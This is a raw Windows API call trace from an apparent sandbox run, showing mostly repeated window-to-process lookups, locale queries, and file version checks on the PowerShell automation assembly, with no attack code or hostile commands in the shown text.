	[0410.930] GetWindowThreadProcessId (in: hWnd=0x800a8, lpdwProcessId=0x26d980 | out: lpdwProcessId=0x26d980) returned 0x4d0
	[0410.930] GetWindowThreadProcessId (in: hWnd=0x400b0, lpdwProcessId=0x26d980 | out: lpdwProcessId=0x26d980) returned 0x4d0
	[0410.930] GetWindowThreadProcessId (in: hWnd=0x300c6, lpdwProcessId=0x26d980 | out: lpdwProcessId=0x26d980) returned 0x4d0
	[0410.930] GetWindowThreadProcessId (in: hWnd=0x300d2, lpdwProcessId=0x26d980 | out: lpdwProcessId=0x26d980) returned 0x4d0
	[0410.930] GetWindowThreadProcessId (in: hWnd=0x300ce, lpdwProcessId=0x26d980 | out: lpdwProcessId=0x26d980) returned 0x4d0
	[0410.930] GetWindowThreadProcessId (in: hWnd=0x300d8, lpdwProcessId=0x26d980 | out: lpdwProcessId=0x26d980) returned 0x4d0
	[0410.931] GetWindowThreadProcessId (in: hWnd=0x400b8, lpdwProcessId=0x26d980 | out: lpdwProcessId=0x26d980) returned 0x4d0
	[0410.931] GetWindowThreadProcessId (in: hWnd=0x300ac, lpdwProcessId=0x26d980 | out: lpdwProcessId=0x26d980) returned 0x4d0
	[0410.931] GetWindowThreadProcessId (in: hWnd=0x101ac, lpdwProcessId=0x26d980 | out: lpdwProcessId=0x26d980) returned 0x818
	[0410.931] GetWindowThreadProcessId (in: hWnd=0x101a8, lpdwProcessId=0x26d980 | out: lpdwProcessId=0x26d980) returned 0x5b8
	[0410.931] GetWindowThreadProcessId (in: hWnd=0x101a4, lpdwProcessId=0x26d980 | out: lpdwProcessId=0x26d980) returned 0x494
	[0410.931] GetWindowThreadProcessId (in: hWnd=0x101a0, lpdwProcessId=0x26d980 | out: lpdwProcessId=0x26d980) returned 0x1ec
	[0410.931] GetWindowThreadProcessId (in: hWnd=0x1019c, lpdwProcessId=0x26d980 | out: lpdwProcessId=0x26d980) returned 0x440
	[0410.931] GetWindowThreadProcessId (in: hWnd=0x10198, lpdwProcessId=0x26d980 | out: lpdwProcessId=0x26d980) returned 0x7e8
	[0410.931] GetWindowThreadProcessId (in: hWnd=0x10194, lpdwProcessId=0x26d980 | out: lpdwProcessId=0x26d980) returned 0x730
	[0410.931] GetWindowThreadProcessId (in: hWnd=0x10190, lpdwProcessId=0x26d980 | out: lpdwProcessId=0x26d980) returned 0x2c8
	[0410.931] GetWindowThreadProcessId (in: hWnd=0x1018c, lpdwProcessId=0x26d980 | out: lpdwProcessId=0x26d980) returned 0x31c
	[0410.932] GetWindowThreadProcessId (in: hWnd=0x10188, lpdwProcessId=0x26d980 | out: lpdwProcessId=0x26d980) returned 0x330
	[0410.932] GetWindowThreadProcessId (in: hWnd=0x10184, lpdwProcessId=0x26d980 | out: lpdwProcessId=0x26d980) returned 0x128
	[0410.932] GetWindowThreadProcessId (in: hWnd=0x10180, lpdwProcessId=0x26d980 | out: lpdwProcessId=0x26d980) returned 0x5c8
	[0410.932] GetWindowThreadProcessId (in: hWnd=0x1017c, lpdwProcessId=0x26d980 | out: lpdwProcessId=0x26d980) returned 0x6f8
	[0410.932] GetWindowThreadProcessId (in: hWnd=0x10178, lpdwProcessId=0x26d980 | out: lpdwProcessId=0x26d980) returned 0x358
	[0410.932] GetWindowThreadProcessId (in: hWnd=0x10174, lpdwProcessId=0x26d980 | out: lpdwProcessId=0x26d980) returned 0x73c
	[0410.932] GetWindowThreadProcessId (in: hWnd=0x10170, lpdwProcessId=0x26d980 | out: lpdwProcessId=0x26d980) returned 0xb0
	[0410.932] GetWindowThreadProcessId (in: hWnd=0x1016c, lpdwProcessId=0x26d980 | out: lpdwProcessId=0x26d980) returned 0x250
	[0410.932] GetWindowThreadProcessId (in: hWnd=0x10168, lpdwProcessId=0x26d980 | out: lpdwProcessId=0x26d980) returned 0x240
	[0410.932] GetWindowThreadProcessId (in: hWnd=0x2015e, lpdwProcessId=0x26d980 | out: lpdwProcessId=0x26d980) returned 0x790
	[0410.932] GetWindowThreadProcessId (in: hWnd=0x40112, lpdwProcessId=0x26d980 | out: lpdwProcessId=0x26d980) returned 0x61c
	[0410.933] GetWindowThreadProcessId (in: hWnd=0x3015a, lpdwProcessId=0x26d980 | out: lpdwProcessId=0x26d980) returned 0x540
	[0410.933] GetWindowThreadProcessId (in: hWnd=0x10150, lpdwProcessId=0x26d980 | out: lpdwProcessId=0x26d980) returned 0x538
	[0410.933] GetWindowThreadProcessId (in: hWnd=0x1014e, lpdwProcessId=0x26d980 | out: lpdwProcessId=0x26d980) returned 0x568
	[0410.933] GetWindowThreadProcessId (in: hWnd=0x20144, lpdwProcessId=0x26d980 | out: lpdwProcessId=0x26d980) returned 0x538
	[0410.933] GetWindowThreadProcessId (in: hWnd=0x10138, lpdwProcessId=0x26d980 | out: lpdwProcessId=0x26d980) returned 0x568
	[0410.933] GetWindowThreadProcessId (in: hWnd=0x10130, lpdwProcessId=0x26d980 | out: lpdwProcessId=0x26d980) returned 0x538
	[0410.933] GetWindowThreadProcessId (in: hWnd=0x10126, lpdwProcessId=0x26d980 | out: lpdwProcessId=0x26d980) returned 0x540
	[0410.933] GetWindowThreadProcessId (in: hWnd=0x200d6, lpdwProcessId=0x26d980 | out: lpdwProcessId=0x26d980) returned 0x540
	[0410.933] GetWindowThreadProcessId (in: hWnd=0x1010c, lpdwProcessId=0x26d980 | out: lpdwProcessId=0x26d980) returned 0x57c
	[0410.933] GetWindowThreadProcessId (in: hWnd=0x10108, lpdwProcessId=0x26d980 | out: lpdwProcessId=0x26d980) returned 0x460
	[0410.933] GetWindowThreadProcessId (in: hWnd=0x10102, lpdwProcessId=0x26d980 | out: lpdwProcessId=0x26d980) returned 0x554
	[0410.934] GetWindowThreadProcessId (in: hWnd=0x50094, lpdwProcessId=0x26d980 | out: lpdwProcessId=0x26d980) returned 0x4d0
	[0410.934] GetWindowThreadProcessId (in: hWnd=0x1008a, lpdwProcessId=0x26d980 | out: lpdwProcessId=0x26d980) returned 0x528
	[0410.934] GetWindowThreadProcessId (in: hWnd=0x10088, lpdwProcessId=0x26d980 | out: lpdwProcessId=0x26d980) returned 0x4d0
	[0410.934] GetWindowThreadProcessId (in: hWnd=0x10080, lpdwProcessId=0x26d980 | out: lpdwProcessId=0x26d980) returned 0x4d0
	[0410.934] GetWindowThreadProcessId (in: hWnd=0x1006e, lpdwProcessId=0x26d980 | out: lpdwProcessId=0x26d980) returned 0x4d0
	[0410.934] GetWindowThreadProcessId (in: hWnd=0x20020, lpdwProcessId=0x26d980 | out: lpdwProcessId=0x26d980) returned 0x79c
	[0410.934] GetWindowThreadProcessId (in: hWnd=0x1006a, lpdwProcessId=0x26d980 | out: lpdwProcessId=0x26d980) returned 0x4d0
	[0410.934] GetWindowThreadProcessId (in: hWnd=0x10058, lpdwProcessId=0x26d980 | out: lpdwProcessId=0x26d980) returned 0x4e0
	[0410.934] GetWindowThreadProcessId (in: hWnd=0x10052, lpdwProcessId=0x26d980 | out: lpdwProcessId=0x26d980) returned 0x4d0
	[0410.934] GetWindowThreadProcessId (in: hWnd=0x1004a, lpdwProcessId=0x26d980 | out: lpdwProcessId=0x26d980) returned 0x460
	[0410.934] GetWindowThreadProcessId (in: hWnd=0x20046, lpdwProcessId=0x26d980 | out: lpdwProcessId=0x26d980) returned 0x460
	[0410.935] GetWindowThreadProcessId (in: hWnd=0x30044, lpdwProcessId=0x26d980 | out: lpdwProcessId=0x26d980) returned 0x44c
	[0410.935] GetWindowThreadProcessId (in: hWnd=0x20018, lpdwProcessId=0x26d980 | out: lpdwProcessId=0x26d980) returned 0x778
	[0410.935] GetWindowThreadProcessId (in: hWnd=0x100f2, lpdwProcessId=0x26d980 | out: lpdwProcessId=0x26d980) returned 0x460
	[0410.935] GetWindowThreadProcessId (in: hWnd=0x30140, lpdwProcessId=0x26d980 | out: lpdwProcessId=0x26d980) returned 0x558
	[0410.935] GetWindowThreadProcessId (in: hWnd=0x1005c, lpdwProcessId=0x26d980 | out: lpdwProcessId=0x26d980) returned 0x4d0
	[0410.935] GetWindowThreadProcessId (in: hWnd=0x10054, lpdwProcessId=0x26d980 | out: lpdwProcessId=0x26d980) returned 0x4d0
	[0410.935] GetWindowThreadProcessId (in: hWnd=0x10576, lpdwProcessId=0x26d980 | out: lpdwProcessId=0x26d980) returned 0xe04
	[0410.935] GetWindowThreadProcessId (in: hWnd=0x10570, lpdwProcessId=0x26d980 | out: lpdwProcessId=0x26d980) returned 0xc94
	[0410.935] GetWindowThreadProcessId (in: hWnd=0x10568, lpdwProcessId=0x26d980 | out: lpdwProcessId=0x26d980) returned 0x13b0
	[0410.935] GetWindowThreadProcessId (in: hWnd=0x10564, lpdwProcessId=0x26d980 | out: lpdwProcessId=0x26d980) returned 0x13ac
	[0410.935] GetWindowThreadProcessId (in: hWnd=0x10560, lpdwProcessId=0x26d980 | out: lpdwProcessId=0x26d980) returned 0x13a8
	[0410.936] GetWindowThreadProcessId (in: hWnd=0x1055a, lpdwProcessId=0x26d980 | out: lpdwProcessId=0x26d980) returned 0x1374
	[0410.936] GetWindowThreadProcessId (in: hWnd=0x10552, lpdwProcessId=0x26d980 | out: lpdwProcessId=0x26d980) returned 0x132c
	[0410.936] GetWindowThreadProcessId (in: hWnd=0x10544, lpdwProcessId=0x26d980 | out: lpdwProcessId=0x26d980) returned 0x1328
	[0410.936] GetWindowThreadProcessId (in: hWnd=0x1051c, lpdwProcessId=0x26d980 | out: lpdwProcessId=0x26d980) returned 0x12d0
	[0410.936] GetWindowThreadProcessId (in: hWnd=0x1050c, lpdwProcessId=0x26d980 | out: lpdwProcessId=0x26d980) returned 0x12cc
	[0410.936] GetWindowThreadProcessId (in: hWnd=0x104fc, lpdwProcessId=0x26d980 | out: lpdwProcessId=0x26d980) returned 0x12c8
	[0410.936] GetWindowThreadProcessId (in: hWnd=0x104da, lpdwProcessId=0x26d980 | out: lpdwProcessId=0x26d980) returned 0x1290
	[0410.936] GetWindowThreadProcessId (in: hWnd=0x104d0, lpdwProcessId=0x26d980 | out: lpdwProcessId=0x26d980) returned 0x1218
	[0410.936] GetWindowThreadProcessId (in: hWnd=0x104cc, lpdwProcessId=0x26d980 | out: lpdwProcessId=0x26d980) returned 0x1214
	[0410.936] GetWindowThreadProcessId (in: hWnd=0x104ca, lpdwProcessId=0x26d980 | out: lpdwProcessId=0x26d980) returned 0x11ec
	[0410.936] GetWindowThreadProcessId (in: hWnd=0x104c6, lpdwProcessId=0x26d980 | out: lpdwProcessId=0x26d980) returned 0x11e8
	[0410.937] GetWindowThreadProcessId (in: hWnd=0x202b4, lpdwProcessId=0x26d980 | out: lpdwProcessId=0x26d980) returned 0x11cc
	[0410.937] GetWindowThreadProcessId (in: hWnd=0x202b6, lpdwProcessId=0x26d980 | out: lpdwProcessId=0x26d980) returned 0x1140
	[0410.937] GetWindowThreadProcessId (in: hWnd=0x104be, lpdwProcessId=0x26d980 | out: lpdwProcessId=0x26d980) returned 0xe6c
	[0410.937] GetWindowThreadProcessId (in: hWnd=0x104ae, lpdwProcessId=0x26d980 | out: lpdwProcessId=0x26d980) returned 0x6e8
	[0410.937] GetWindowThreadProcessId (in: hWnd=0x10490, lpdwProcessId=0x26d980 | out: lpdwProcessId=0x26d980) returned 0xc6c
	[0410.937] GetWindowThreadProcessId (in: hWnd=0x10480, lpdwProcessId=0x26d980 | out: lpdwProcessId=0x26d980) returned 0xf94
	[0410.937] GetWindowThreadProcessId (in: hWnd=0x10470, lpdwProcessId=0x26d980 | out: lpdwProcessId=0x26d980) returned 0xffc
	[0410.937] GetWindowThreadProcessId (in: hWnd=0x10460, lpdwProcessId=0x26d980 | out: lpdwProcessId=0x26d980) returned 0xf74
	[0410.937] GetWindowThreadProcessId (in: hWnd=0x1044e, lpdwProcessId=0x26d980 | out: lpdwProcessId=0x26d980) returned 0xf08
	[0410.937] GetWindowThreadProcessId (in: hWnd=0x10442, lpdwProcessId=0x26d980 | out: lpdwProcessId=0x26d980) returned 0xf0c
	[0410.937] GetWindowThreadProcessId (in: hWnd=0x1043a, lpdwProcessId=0x26d980 | out: lpdwProcessId=0x26d980) returned 0xed8
	[0410.938] GetWindowThreadProcessId (in: hWnd=0x10436, lpdwProcessId=0x26d980 | out: lpdwProcessId=0x26d980) returned 0xe90
	[0410.938] GetWindowThreadProcessId (in: hWnd=0x10432, lpdwProcessId=0x26d980 | out: lpdwProcessId=0x26d980) returned 0xea8
	[0410.938] GetWindowThreadProcessId (in: hWnd=0x10416, lpdwProcessId=0x26d980 | out: lpdwProcessId=0x26d980) returned 0xfa8
	[0410.938] GetWindowThreadProcessId (in: hWnd=0x10412, lpdwProcessId=0x26d980 | out: lpdwProcessId=0x26d980) returned 0xfbc
	[0410.938] GetWindowThreadProcessId (in: hWnd=0x1040e, lpdwProcessId=0x26d980 | out: lpdwProcessId=0x26d980) returned 0xfb8
	[0410.938] GetWindowThreadProcessId (in: hWnd=0x1040a, lpdwProcessId=0x26d980 | out: lpdwProcessId=0x26d980) returned 0xfb4
	[0410.938] GetWindowThreadProcessId (in: hWnd=0x10406, lpdwProcessId=0x26d980 | out: lpdwProcessId=0x26d980) returned 0xfb0
	[0410.938] GetWindowThreadProcessId (in: hWnd=0x10402, lpdwProcessId=0x26d980 | out: lpdwProcessId=0x26d980) returned 0xfac
	[0410.938] GetWindowThreadProcessId (in: hWnd=0x103fe, lpdwProcessId=0x26d980 | out: lpdwProcessId=0x26d980) returned 0xfc0
	[0410.938] GetWindowThreadProcessId (in: hWnd=0x103f0, lpdwProcessId=0x26d980 | out: lpdwProcessId=0x26d980) returned 0xfd0
	[0410.939] GetWindowThreadProcessId (in: hWnd=0x1039a, lpdwProcessId=0x26d980 | out: lpdwProcessId=0x26d980) returned 0xf88
	[0410.939] GetWindowThreadProcessId (in: hWnd=0x1038a, lpdwProcessId=0x26d980 | out: lpdwProcessId=0x26d980) returned 0xf84
	[0410.939] GetWindowThreadProcessId (in: hWnd=0x10382, lpdwProcessId=0x26d980 | out: lpdwProcessId=0x26d980) returned 0xf80
	[0410.939] GetWindowThreadProcessId (in: hWnd=0x1036e, lpdwProcessId=0x26d980 | out: lpdwProcessId=0x26d980) returned 0xde0
	[0410.939] GetWindowThreadProcessId (in: hWnd=0x1036a, lpdwProcessId=0x26d980 | out: lpdwProcessId=0x26d980) returned 0xddc
	[0410.939] GetWindowThreadProcessId (in: hWnd=0x10366, lpdwProcessId=0x26d980 | out: lpdwProcessId=0x26d980) returned 0xdd8
	[0410.939] GetWindowThreadProcessId (in: hWnd=0x10360, lpdwProcessId=0x26d980 | out: lpdwProcessId=0x26d980) returned 0xd34
	[0410.939] GetWindowThreadProcessId (in: hWnd=0x10358, lpdwProcessId=0x26d980 | out: lpdwProcessId=0x26d980) returned 0xd10
	[0410.939] GetWindowThreadProcessId (in: hWnd=0x20276, lpdwProcessId=0x26d980 | out: lpdwProcessId=0x26d980) returned 0xd0c
	[0410.939] GetWindowThreadProcessId (in: hWnd=0x800a4, lpdwProcessId=0x26d980 | out: lpdwProcessId=0x26d980) returned 0xc9c
	[0410.940] GetWindowThreadProcessId (in: hWnd=0x10346, lpdwProcessId=0x26d980 | out: lpdwProcessId=0x26d980) returned 0xc74
	[0410.940] GetWindowThreadProcessId (in: hWnd=0x1032c, lpdwProcessId=0x26d980 | out: lpdwProcessId=0x26d980) returned 0xc1c
	[0410.940] GetWindowThreadProcessId (in: hWnd=0x10318, lpdwProcessId=0x26d980 | out: lpdwProcessId=0x26d980) returned 0xc08
	[0410.940] GetWindowThreadProcessId (in: hWnd=0x102fa, lpdwProcessId=0x26d980 | out: lpdwProcessId=0x26d980) returned 0xabc
	[0410.940] GetWindowThreadProcessId (in: hWnd=0x102e0, lpdwProcessId=0x26d980 | out: lpdwProcessId=0x26d980) returned 0x24c
	[0410.940] GetWindowThreadProcessId (in: hWnd=0x102dc, lpdwProcessId=0x26d980 | out: lpdwProcessId=0x26d980) returned 0xbb0
	[0410.940] GetWindowThreadProcessId (in: hWnd=0x102d2, lpdwProcessId=0x26d980 | out: lpdwProcessId=0x26d980) returned 0xbfc
	[0410.940] GetWindowThreadProcessId (in: hWnd=0x102ce, lpdwProcessId=0x26d980 | out: lpdwProcessId=0x26d980) returned 0xb10
	[0410.940] GetWindowThreadProcessId (in: hWnd=0x102ca, lpdwProcessId=0x26d980 | out: lpdwProcessId=0x26d980) returned 0x374
	[0410.940] GetWindowThreadProcessId (in: hWnd=0x102c6, lpdwProcessId=0x26d980 | out: lpdwProcessId=0x26d980) returned 0x368
	[0410.940] GetWindowThreadProcessId (in: hWnd=0x102c2, lpdwProcessId=0x26d980 | out: lpdwProcessId=0x26d980) returned 0xb28
	[0410.941] GetWindowThreadProcessId (in: hWnd=0x102be, lpdwProcessId=0x26d980 | out: lpdwProcessId=0x26d980) returned 0xae8
	[0410.941] GetWindowThreadProcessId (in: hWnd=0x102b2, lpdwProcessId=0x26d980 | out: lpdwProcessId=0x26d980) returned 0xb14
	[0410.941] GetWindowThreadProcessId (in: hWnd=0x102ae, lpdwProcessId=0x26d980 | out: lpdwProcessId=0x26d980) returned 0x95c
	[0410.941] GetWindowThreadProcessId (in: hWnd=0x102aa, lpdwProcessId=0x26d980 | out: lpdwProcessId=0x26d980) returned 0xa8c
	[0410.941] GetWindowThreadProcessId (in: hWnd=0x202a0, lpdwProcessId=0x26d980 | out: lpdwProcessId=0x26d980) returned 0x46c
	[0410.941] GetWindowThreadProcessId (in: hWnd=0x10264, lpdwProcessId=0x26d980 | out: lpdwProcessId=0x26d980) returned 0xb3c
	[0410.941] GetWindowThreadProcessId (in: hWnd=0x10254, lpdwProcessId=0x26d980 | out: lpdwProcessId=0x26d980) returned 0xa90
	[0410.941] GetWindowThreadProcessId (in: hWnd=0x10244, lpdwProcessId=0x26d980 | out: lpdwProcessId=0x26d980) returned 0xad0
	[0410.941] GetWindowThreadProcessId (in: hWnd=0x1022a, lpdwProcessId=0x26d980 | out: lpdwProcessId=0x26d980) returned 0xa9c
	[0410.941] GetWindowThreadProcessId (in: hWnd=0x10226, lpdwProcessId=0x26d980 | out: lpdwProcessId=0x26d980) returned 0xaa0
	[0410.941] GetWindowThreadProcessId (in: hWnd=0x10222, lpdwProcessId=0x26d980 | out: lpdwProcessId=0x26d980) returned 0xb1c
	[0410.942] GetWindowThreadProcessId (in: hWnd=0x1021e, lpdwProcessId=0x26d980 | out: lpdwProcessId=0x26d980) returned 0x7e0
	[0410.942] GetWindowThreadProcessId (in: hWnd=0x10216, lpdwProcessId=0x26d980 | out: lpdwProcessId=0x26d980) returned 0xa74
	[0410.942] GetWindowThreadProcessId (in: hWnd=0x20208, lpdwProcessId=0x26d980 | out: lpdwProcessId=0x26d980) returned 0x694
	[0410.942] GetWindowThreadProcessId (in: hWnd=0x401f0, lpdwProcessId=0x26d980 | out: lpdwProcessId=0x26d980) returned 0xa28
	[0410.942] GetWindowThreadProcessId (in: hWnd=0x1020c, lpdwProcessId=0x26d980 | out: lpdwProcessId=0x26d980) returned 0x9b0
	[0410.942] GetWindowThreadProcessId (in: hWnd=0x10202, lpdwProcessId=0x26d980 | out: lpdwProcessId=0x26d980) returned 0x8d8
	[0410.942] GetWindowThreadProcessId (in: hWnd=0x201ca, lpdwProcessId=0x26d980 | out: lpdwProcessId=0x26d980) returned 0x940
	[0410.942] GetWindowThreadProcessId (in: hWnd=0x201d8, lpdwProcessId=0x26d980 | out: lpdwProcessId=0x26d980) returned 0x93c
	[0410.942] GetWindowThreadProcessId (in: hWnd=0x301e2, lpdwProcessId=0x26d980 | out: lpdwProcessId=0x26d980) returned 0x4ec
	[0410.942] GetWindowThreadProcessId (in: hWnd=0x201de, lpdwProcessId=0x26d980 | out: lpdwProcessId=0x26d980) returned 0x150
	[0410.942] GetWindowThreadProcessId (in: hWnd=0x201c8, lpdwProcessId=0x26d980 | out: lpdwProcessId=0x26d980) returned 0x720
	[0410.943] GetWindowThreadProcessId (in: hWnd=0x301f4, lpdwProcessId=0x26d980 | out: lpdwProcessId=0x26d980) returned 0x3c4
	[0410.943] GetWindowThreadProcessId (in: hWnd=0x301c0, lpdwProcessId=0x26d980 | out: lpdwProcessId=0x26d980) returned 0x7d4
	[0410.943] GetWindowThreadProcessId (in: hWnd=0x301c4, lpdwProcessId=0x26d980 | out: lpdwProcessId=0x26d980) returned 0x6c8
	[0410.943] GetWindowThreadProcessId (in: hWnd=0x4011e, lpdwProcessId=0x26d980 | out: lpdwProcessId=0x26d980) returned 0xb54
	[0410.943] GetWindowThreadProcessId (in: hWnd=0x50122, lpdwProcessId=0x26d980 | out: lpdwProcessId=0x26d980) returned 0xb54
	[0410.943] GetWindowThreadProcessId (in: hWnd=0x501b8, lpdwProcessId=0x26d980 | out: lpdwProcessId=0x26d980) returned 0xb5c
	[0410.943] GetWindowThreadProcessId (in: hWnd=0x101b2, lpdwProcessId=0x26d980 | out: lpdwProcessId=0x26d980) returned 0x838
	[0410.943] GetWindowThreadProcessId (in: hWnd=0x101ae, lpdwProcessId=0x26d980 | out: lpdwProcessId=0x26d980) returned 0x818
	[0410.943] GetWindowThreadProcessId (in: hWnd=0x101aa, lpdwProcessId=0x26d980 | out: lpdwProcessId=0x26d980) returned 0x5b8
	[0410.943] GetWindowThreadProcessId (in: hWnd=0x101a6, lpdwProcessId=0x26d980 | out: lpdwProcessId=0x26d980) returned 0x494
	[0410.944] GetWindowThreadProcessId (in: hWnd=0x101a2, lpdwProcessId=0x26d980 | out: lpdwProcessId=0x26d980) returned 0x1ec
	[0410.944] GetWindowThreadProcessId (in: hWnd=0x1019e, lpdwProcessId=0x26d980 | out: lpdwProcessId=0x26d980) returned 0x440
	[0410.944] GetWindowThreadProcessId (in: hWnd=0x1019a, lpdwProcessId=0x26d980 | out: lpdwProcessId=0x26d980) returned 0x7e8
	[0410.944] GetWindowThreadProcessId (in: hWnd=0x10196, lpdwProcessId=0x26d980 | out: lpdwProcessId=0x26d980) returned 0x730
	[0410.944] GetWindowThreadProcessId (in: hWnd=0x10192, lpdwProcessId=0x26d980 | out: lpdwProcessId=0x26d980) returned 0x2c8
	[0410.944] GetWindowThreadProcessId (in: hWnd=0x1018e, lpdwProcessId=0x26d980 | out: lpdwProcessId=0x26d980) returned 0x31c
	[0410.944] GetWindowThreadProcessId (in: hWnd=0x1018a, lpdwProcessId=0x26d980 | out: lpdwProcessId=0x26d980) returned 0x330
	[0410.944] GetWindowThreadProcessId (in: hWnd=0x10186, lpdwProcessId=0x26d980 | out: lpdwProcessId=0x26d980) returned 0x128
	[0410.944] GetWindowThreadProcessId (in: hWnd=0x10182, lpdwProcessId=0x26d980 | out: lpdwProcessId=0x26d980) returned 0x5c8
	[0410.944] GetWindowThreadProcessId (in: hWnd=0x1017e, lpdwProcessId=0x26d980 | out: lpdwProcessId=0x26d980) returned 0x6f8
	[0410.945] GetWindowThreadProcessId (in: hWnd=0x1017a, lpdwProcessId=0x26d980 | out: lpdwProcessId=0x26d980) returned 0x358
	[0410.945] GetWindowThreadProcessId (in: hWnd=0x10176, lpdwProcessId=0x26d980 | out: lpdwProcessId=0x26d980) returned 0x73c
	[0410.945] GetWindowThreadProcessId (in: hWnd=0x10172, lpdwProcessId=0x26d980 | out: lpdwProcessId=0x26d980) returned 0xb0
	[0410.945] GetWindowThreadProcessId (in: hWnd=0x1016e, lpdwProcessId=0x26d980 | out: lpdwProcessId=0x26d980) returned 0x250
	[0410.945] GetWindowThreadProcessId (in: hWnd=0x1016a, lpdwProcessId=0x26d980 | out: lpdwProcessId=0x26d980) returned 0x240
	[0410.945] GetWindowThreadProcessId (in: hWnd=0x20160, lpdwProcessId=0x26d980 | out: lpdwProcessId=0x26d980) returned 0x790
	[0410.945] GetWindowThreadProcessId (in: hWnd=0x70110, lpdwProcessId=0x26d980 | out: lpdwProcessId=0x26d980) returned 0x61c
	[0410.945] GetWindowThreadProcessId (in: hWnd=0x1013a, lpdwProcessId=0x26d980 | out: lpdwProcessId=0x26d980) returned 0x568
	[0410.945] GetWindowThreadProcessId (in: hWnd=0x10132, lpdwProcessId=0x26d980 | out: lpdwProcessId=0x26d980) returned 0x538
	[0410.945] GetWindowThreadProcessId (in: hWnd=0x10128, lpdwProcessId=0x26d980 | out: lpdwProcessId=0x26d980) returned 0x540
	[0410.945] GetWindowThreadProcessId (in: hWnd=0x20104, lpdwProcessId=0x26d980 | out: lpdwProcessId=0x26d980) returned 0x460
	[0410.946] GetWindowThreadProcessId (in: hWnd=0x2002a, lpdwProcessId=0x26d980 | out: lpdwProcessId=0x26d980) returned 0x79c
	[0410.946] GetWindowThreadProcessId (in: hWnd=0x1005a, lpdwProcessId=0x26d980 | out: lpdwProcessId=0x26d980) returned 0x4e0
	[0410.946] GetWindowThreadProcessId (in: hWnd=0x10048, lpdwProcessId=0x26d980 | out: lpdwProcessId=0x26d980) returned 0x460
	[0410.946] GetWindowThreadProcessId (in: hWnd=0x2001a, lpdwProcessId=0x26d980 | out: lpdwProcessId=0x26d980) returned 0x778
	[0410.950] WerSetFlags () returned 0x0
	[0411.305] SetThreadPreferredUILanguages (in: dwFlags=0x100, pwszLanguagesBuffer=0x0, pulNumLanguages=0x0 | out: pulNumLanguages=0x0) returned 1
	[0411.305] CoTaskMemFree (pv=0x0) 
	[0411.306] GetThreadPreferredUILanguages (in: dwFlags=0x38, pulNumLanguages=0x26dce8, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0x26dce0 | out: pulNumLanguages=0x26dce8, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0x26dce0) returned 1
	[0411.306] GetThreadPreferredUILanguages (in: dwFlags=0x38, pulNumLanguages=0x26dce8, pwszLanguagesBuffer=0x2dcbaf8, pcchLanguagesBuffer=0x26dce0 | out: pulNumLanguages=0x26dce8, pwszLanguagesBuffer=0x2dcbaf8, pcchLanguagesBuffer=0x26dce0) returned 1
	[0411.310] CoTaskMemAlloc (cb=0x24) returned 0x167220
	[0411.310] GetUserDefaultLocaleName (in: lpLocaleName=0x167220, cchLocaleName=16 | out: lpLocaleName="en-US") returned 6
	[0411.310] CoTaskMemFree (pv=0x167220) 
	[0411.332] CoTaskMemAlloc (cb=0x104) returned 0x16f150
	[0411.332] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x16f150, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0411.333] CoTaskMemFree (pv=0x16f150) 
	[0411.334] CoTaskMemAlloc (cb=0x104) returned 0x16f150
	[0411.334] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x16f150, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0411.334] CoTaskMemFree (pv=0x16f150) 
	[0411.336] CoTaskMemAlloc (cb=0x104) returned 0x16f150
	[0411.336] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x16f150, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0411.336] CoTaskMemFree (pv=0x16f150) 
	[0411.642] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26d6b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0411.642] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26d750, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0411.643] SetErrorMode (uMode=0x1) returned 0x1
	[0411.643] GetFileAttributesExW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\system.management.automation\\1.0.0.0__31bf3856ad364e35\\system.management.automation.dll"), fInfoLevelId=0x0, lpFileInformation=0x26d960 | out: lpFileInformation=0x26d960*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa85ac0a8, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xa85ac0a8, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xa85d2208, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x2df000)) returned 1
	[0411.643] SetErrorMode (uMode=0x1) returned 0x1
	[0411.643] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpdwHandle=0x26dbd0 | out: lpdwHandle=0x26dbd0) returned 0x94c
	[0411.654] GetFileVersionInfoW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", dwHandle=0x0, dwLen=0x94c, lpData=0x2dcf388 | out: lpData=0x2dcf388) returned 1
	[0411.655] VerQueryValueW (in: pBlock=0x2dcf388, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x26db48, puLen=0x26db40 | out: lplpBuffer=0x26db48*=0x2dcf424, puLen=0x26db40) returned 1
